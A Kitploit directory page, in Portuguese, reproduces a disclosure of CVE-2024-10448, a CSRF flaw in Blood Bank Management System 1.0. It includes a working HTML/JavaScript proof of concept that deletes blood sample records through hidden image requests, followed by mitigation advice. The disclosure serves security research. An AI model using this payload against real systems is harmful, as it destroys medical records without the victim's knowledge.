Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10448 — Prova de Conceito de Ataque CSRF em Banco de Sangue | Kitploit
Ferramentas/GitHubGitHub/bevennyamande/cve-2024-10448
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

Prova de Conceito de Ataque CSRF em Banco de Sangue

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Versão Afetada:

  • Sistema de Gerenciamento de Banco de Sangue: 1.0

Informações da Vulnerabilidade:

  • Tipo de Vulnerabilidade: Cross Site Request Forgery (CSRF)
  • Severidade: ALTA
  • Status: Sem correção

Endpoint Vulnerável:

  • Caminho: /file/delete.php?bid=

Descrição da Vulnerabilidade:

Uma vulnerabilidade de Cross Site Request Forgery (CSRF) foi descoberta na funcionalidade de solicitação de sangue do Sistema de Gerenciamento de Banco de Sangue. Essa falha ocorre ao enviar uma requisição delete para este caminho /file/delete.php?bid=, permitindo que o parâmetro selecione um registro para exclusão na aplicação. Os , no entanto, são dinâmicos, dependendo da adição das amostras de sangue; para tornar a requisição bem‑sucedida, utilizei uma tag de imagem gerada por JavaScript dentro de um loop.

Baixar ferramenta
bid
bids

A exploração bem‑sucedida pode levar a ações não autorizadas, como exclusão de dados em nome da vítima. Além disso, isso pode ser explorado ao visitar sites maliciosos com a carga útil.


Prova de Conceito (PoC):

Abaixo está um exemplo de um Ataque PoC CSRF que exclui as amostras de sangue disponíveis por meio do parâmetro bid. Hospede o arquivo em um domínio controlado pelo atacante; no meu caso, estava usando localhost:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


Vídeo PoC

  • link do vídeo

Impacto:

  • Manipulação de Dados: Atacantes poderiam modificar o conteúdo exibido aos usuários.
  • Dano à Reputação: Os usuários podem perder a confiança no sistema devido ao comportamento malicioso.

Recomendações de Mitigação:

  1. Use Token CSRF – Implemente um mecanismo para impedir o acesso entre domínios ou coloque tokens csrf em suas requisições e também evite que requisições GET realizem ações que alterem o estado.